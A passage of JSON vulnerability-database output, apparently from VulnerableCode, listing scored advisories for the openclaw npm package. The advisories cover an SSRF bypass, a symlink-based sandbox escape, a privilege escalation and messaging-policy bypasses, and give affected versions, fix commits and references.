"scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:L/A:N" }, { "value": "4.8", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:H/SI:L/SA:N" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-30T12:56:41Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-w8g9-x8gx-crmm", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "4.8", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:H/SI:L/SA:N" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-30T12:56:41Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-w8g9-x8gx-crmm" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42430", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:L/A:N" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42430" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-strict-browser-ssrf-bypass-via-playwright-redirect-handling", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:L/A:N" }, { "value": "4.8", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:H/SI:L/SA:N" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-30T12:56:41Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-strict-browser-ssrf-bypass-via-playwright-redirect-handling" }, { "reference_url": "https://github.com/advisories/GHSA-w8g9-x8gx-crmm", "reference_id": "GHSA-w8g9-x8gx-crmm", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-w8g9-x8gx-crmm" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109872?format=api", "purl": "pkg:npm/openclaw@2026.4.8", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2g7x-vu14-nkde" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dqb2-dej7-augt" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-h9a4-1twb-d7d1" }, { "vulnerability": "VCID-hy24-6xpe-pkb7" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-pj41-sunw-vbcj" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w2yd-uw91-9yck" }, { "vulnerability": "VCID-wyat-1259-2kg9" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.8" } ], "aliases": [ "CVE-2026-42430", "GHSA-w8g9-x8gx-crmm" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-haxd-ps1x-h3ch" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89349?format=api", "vulnerability_id": "VCID-hd4w-s3dp-nubj", "summary": "OpenClaw: OpenShell Mirror Sync — Sandbox Escape via Unrestricted File Sync + Symlink Traversal\n## Summary\nOpenShell Mirror Sync: Sandbox Escape via Unrestricted File Sync + Symlink Traversal\n\n## Current Maintainer Triage\n- Status: narrow\n- Normalized severity: high\n- Assessment: v2026.3.28 still has the mirror-boundary bug because shipped c02ee8 only excluded hooks while unreleased 3b9dab is the first full symlink-free upload and download hardening.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `c02ee8a3a4cb390b23afdf21317aa8b2096854d1` — 2026-03-25T19:59:07Z\n- `3b9dab0ece4643a9643e6a45459f5c709d3ce320` — 2026-03-30T14:51:44+01:00\n\nOpenClaw thanks @AntAISecurityLab for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41397", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00075", "scoring_system": "epss", "scoring_elements": "0.2259", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00075", "scoring_system": "epss", "scoring_elements": "0.22636", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00075", "scoring_system": "epss", "scoring_elements": "0.22651", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41397" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/3b9dab0ece4643a9643e6a45459f5c709d3ce320", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N" }, { "value": "9.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N" }, { "value": "7.6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T14:37:54Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/3b9dab0ece4643a9643e6a45459f5c709d3ce320" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/c02ee8a3a4cb390b23afdf21317aa8b2096854d1", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N" }, { "value": "9.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N" }, { "value": "7.6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T14:37:54Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/c02ee8a3a4cb390b23afdf21317aa8b2096854d1" }, { "reference_url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-cwf8-44x6-32c2", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N" }, { "value": "9.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "7.6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T14:37:54Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-cwf8-44x6-32c2" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41397", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41397" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-sandbox-escape-via-unrestricted-file-sync-and-symlink-traversal", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N" }, { "value": "9.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N" }, { "value": "7.6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T14:37:54Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-sandbox-escape-via-unrestricted-file-sync-and-symlink-traversal" }, { "reference_url": "https://github.com/advisories/GHSA-cwf8-44x6-32c2", "reference_id": "GHSA-cwf8-44x6-32c2", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-cwf8-44x6-32c2" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109907?format=api", "purl": "pkg:npm/openclaw@2026.3.31", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-pj41-sunw-vbcj" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31" } ], "aliases": [ "CVE-2026-41397", "GHSA-cwf8-44x6-32c2" ], "risk_score": 4.3, "exploitability": "0.5", "weighted_severity": "8.6", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-hd4w-s3dp-nubj" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91601?format=api", "vulnerability_id": "VCID-hkqd-6khg-m3hj", "summary": "OpenClaw: Silent privilege escalation via gateway shared-auth reconnect\n## Summary\n\nGateway local shared-auth reconnect silently widens paired device scope from operator.read to operator.admin and reach node RCE\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Affected versions: `<= 2026.3.24`\n- First patched version: `2026.3.25`\n- Latest published npm version at verification time: `2026.3.24`\n\n## Details\n\nSilent local shared-auth reconnects could previously auto-approve `scope-upgrade` requests and widen a paired device from `operator.read` to `operator.admin`. Commit `81ebc7e0344fd19c85778e883bad45e2da972229` blocks silent reconnect scope upgrades so widened scopes require an explicit pairing approval instead of an implicit local reconnect path.\n\nVerified vulnerable on tag `v2026.3.24` and fixed on `main` by commit `81ebc7e0344fd19c85778e883bad45e2da972229`.\n\n## Fix Commit(s)\n\n- `81ebc7e0344fd19c85778e883bad45e2da972229`", "references": [ { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/81ebc7e0344fd19c85778e883bad45e2da972229", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/commit/81ebc7e0344fd19c85778e883bad45e2da972229" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-fqw4-mph7-2vr8", "reference_id": "", "reference_type": "", "scores": [ { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "9.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-fqw4-mph7-2vr8" }, { "reference_url": "https://github.com/advisories/GHSA-fqw4-mph7-2vr8", "reference_id": "GHSA-fqw4-mph7-2vr8", "reference_type": "", "scores": [ { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-fqw4-mph7-2vr8" } ], "fixed_packages": [], "aliases": [ "GHSA-fqw4-mph7-2vr8" ], "risk_score": 4.5, "exploitability": "0.5", "weighted_severity": "9.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-hkqd-6khg-m3hj" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89119?format=api", "vulnerability_id": "VCID-hz33-9efv-c7ef", "summary": "OpenClaw: Feishu card actions could misclassify DMs and skip dmPolicy\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `< 2026.4.20`\n- Patched version: `2026.4.20`\n\n## Impact\n\nFeishu card-action callbacks could synthesize a message event with DM conversations classified as group conversations. That skipped `dmPolicy` enforcement for card actions, so a sender in a Feishu DM could trigger card-action flows that should have been blocked by a restrictive DM policy.\n\nThe issue is limited to Feishu card-action handling. Severity is medium.\n\n## Fix\n\nOpenClaw now resolves Feishu card-action chat type before dispatch, including API lookup when stored context is unavailable, and avoids falling through to group handling for DMs.\n\nFix commit:\n\n- `90979d7c3ef7ec30b9f8aa6963a5e38d2f17d166`\n\n## Release\n\nFixed in OpenClaw `2026.4.20`.", "references": [ { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/90979d7c3ef7ec30b9f8aa6963a5e38d2f17d166", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/commit/90979d7c3ef7ec30b9f8aa6963a5e38d2f17d166" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-72q8-jcmc-97wx", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-72q8-jcmc-97wx" }, { "reference_url": "https://github.com/advisories/GHSA-72q8-jcmc-97wx", "reference_id": "GHSA-72q8-jcmc-97wx", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-72q8-jcmc-97wx" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109923?format=api", "purl": "pkg:npm/openclaw@2026.4.20", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.20" } ], "aliases": [ "GHSA-72q8-jcmc-97wx" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-hz33-9efv-c7ef" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89568?format=api", "vulnerability_id": "VCID-j8fb-fhyc-33fu", "summary": "OpenClaw: MSTeams thread history bypasses sender allowlist via Graph API\n## Summary\nMSTeams thread history bypasses sender allowlist via Graph API\n\n## Current 